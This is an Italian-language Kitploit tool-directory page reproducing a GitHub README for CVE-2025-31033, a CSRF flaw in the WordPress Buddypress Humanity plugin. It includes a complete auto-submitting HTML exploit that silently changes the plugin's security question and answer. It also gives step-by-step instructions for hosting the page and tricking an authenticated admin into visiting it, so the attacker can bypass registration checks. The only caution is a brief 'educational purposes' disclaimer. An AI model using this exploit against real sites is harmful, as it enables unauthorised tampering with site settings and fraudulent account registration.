Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-31033 — WordPress Buddypress Humanity Plugin <= 1.2 è vulnerabile a Cross Site Request Forgery (CSRF) | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2025-31033
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPaper e RicercaApprendimento e Formazione
GitHubnxploited/cve-2025-31033

CVE-2025-31033

WordPress Buddypress Humanity Plugin <= 1.2 è vulnerabile a Cross Site Request Forgery (CSRF)

Vedi Repository
61 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

⚠️ CVE-2025-31033 - CSRF nel plugin Buddypress Humanity per WordPress <= 1.2

🛡️ Riepilogo della vulnerabilità

Il plugin Buddypress Humanity per WordPress (versione <= 1.2) è vulnerabile a Cross-Site Request Forgery (CSRF).
Questa vulnerabilità consente a un attaccante di costringere un utente con privilegi più elevati (es. admin) a modificare inconsapevolmente le impostazioni del plugin (come la domanda di sicurezza e la risposta), aggirando la logica di verifica dell'utente.


🐞 Tipo di vulnerabilità

  • Cross Site Request Forgery (CSRF)
  • Componente interessato: pagina bph-settings (solo admin)
  • CVE: CVE-2025-31033
  • Rischi CVSS 9.8

🚨 Impatto

Se sfruttata con successo, questa vulnerabilità consente agli attaccanti di:

  • Modificare la domanda di sicurezza e la risposta usate durante la registrazione dell'utente
  • Aggirare la verifica di umanità conoscendo la nuova risposta
  • Automatizzare la registrazione degli utenti (possibilmente combinata con escalation dei privilegi)
  • Abusare delle protezioni del modulo di registrazione senza interazione dell'utente

🎯 Plugin interessato

  • Nome: Buddypress Humanity
  • Versione: ≤ 1.2
  • Slug: buddypress-humanity
  • Testato su: WordPress 6.x + BuddyPress attivo

💥 Prova di concetto (Exploit HTML)

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Exploit – CVE-2025-31033</title>
</head>
<body onload="document.forms[0].submit();">
  <form action="http://target.com/wp-admin/admin.php?page=bph-settings" method="POST">
    <input type="hidden" name="bph_option[bph_title]" value="Nxploited">
    <input type="hidden" name="bph_option[bph_question]" value="I’m Nxploited | Khaled Alenazi">
    <input type="hidden" name="bph_option[bph_answers]" value="Nxploit">
    <input type="hidden" name="bph_submit" value="1">
  </form>
</body>
</html>

☠️ Quando questa pagina viene aperta da un admin autenticato, modifica silenziosamente le impostazioni del plugin.


🔧 Come sfruttare la vulnerabilità

  1. Ospita l'HTML del PoC su qualsiasi server esterno.
  2. Induci un admin WordPress autenticato a visitare la pagina.
  3. Alla visita, il suo browser invierà silenziosamente il modulo.
  4. La domanda di sicurezza e la risposta del plugin verranno aggiornate.
  5. L'attaccante può ora registrarsi usando la risposta nota.

🧪 Uno sfruttamento riuscito comporta:

  • Domanda modificata: I’m Nxploited | Khaled Alenazi
  • Risposta modificata: Nxploit
  • Qualsiasi utente che inserisce "Nxploit" aggirerà la verifica.

⚠️ Disclaimer

Questa prova di concetto è solo a scopo educativo.
Usala in modo responsabile e non testare su sistemi che non possiedi.
L'autore non è responsabile per qualsiasi uso improprio o danno causato.


👤 Autore

Nxploited | Khaled Alenazi

Scarica lo strumento